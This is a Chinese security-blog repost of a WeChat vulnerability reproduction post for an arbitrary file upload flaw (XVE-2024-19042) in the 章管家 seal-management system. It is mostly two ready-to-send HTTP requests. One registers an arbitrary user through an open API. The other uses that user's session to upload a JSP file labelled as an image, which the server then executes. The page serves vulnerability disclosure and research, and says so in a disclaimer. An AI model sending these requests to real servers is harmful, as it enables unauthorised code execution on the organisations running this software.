章管家前台任意文件上传漏洞(XVE-2024-19042) poc

admin 2024年8月7日22:24:36评论121 views字数 1814阅读6分2秒阅读模式

漏洞简介

章管家是上海建业信息科技股份有限公司推出的一款针对传统印章风险管理提供的整套解决方案的工具。攻击者可通过任意用户注册配合后台文件上传漏洞利用获取服务器权限。

漏洞POC

用户注册POC如下:

POST /api/personSeal_jdy/saveUser.htm HTTP/1.1Host: User-Agent:  Mozilla/5.0  (Windows  NT  10.0;  Win64;  x64)  AppleWebKit/537.36(KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/jsonContent-Length: 211{"op":{},"data":{"mobile":"13333333333","uid":"13333333333","password":"123456","name":"testuser","return_url":"https://www.baidu.com","apisecretkey":"1","_id":"1","mail_address":"[email protected]"},"b7o4ntosbfp":"="}

注册成功后13333333333/123456登录获取cookie文件上传。

POST /seal/sealApply/uploadFileByChunks.htm?token=dingtalk_token&person_id=40288053800311e80180261b92ab005e&chunk=1&chunks=1&guid=1 HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0)Gecko/20100101 Firefox/128.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Cookie: sid=58139d92-115f-4e9b-99a1-ee200a8b17a0;ZHANGIN_CHECKBOX=false; ZHANGIN_MOBILE=;JSESSIONID=30A3F3F324080E3B327FEB2EB82E2CB0Content-Type: multipart/form-data; boundary=--------952870761Content-Length: 140----------952870761Content-Disposition: form-data; name="file"; filename="1.jsp"Content-Type: image/jpeg<%@ page import= "java.io.File" %><%out.println("111");String filePath = application.getRealPath(request.getServletPath());out.println(filePath);new File(filePath).delete();%>----------952870761--

参考链接:https://github.com/wy876/POC/blob/main/%E7%AB%A0%E7%AE%A1%E5%AE%B6%E5%89%8D%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E(XVE-2024-19042).md

 

原文始发于微信公众号(良月安全):[漏洞复现]章管家前台任意文件上传漏洞(XVE-2024-19042)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月7日22:24:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   章管家前台任意文件上传漏洞(XVE-2024-19042) pochttps://cn-sec.com/archives/3043837.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息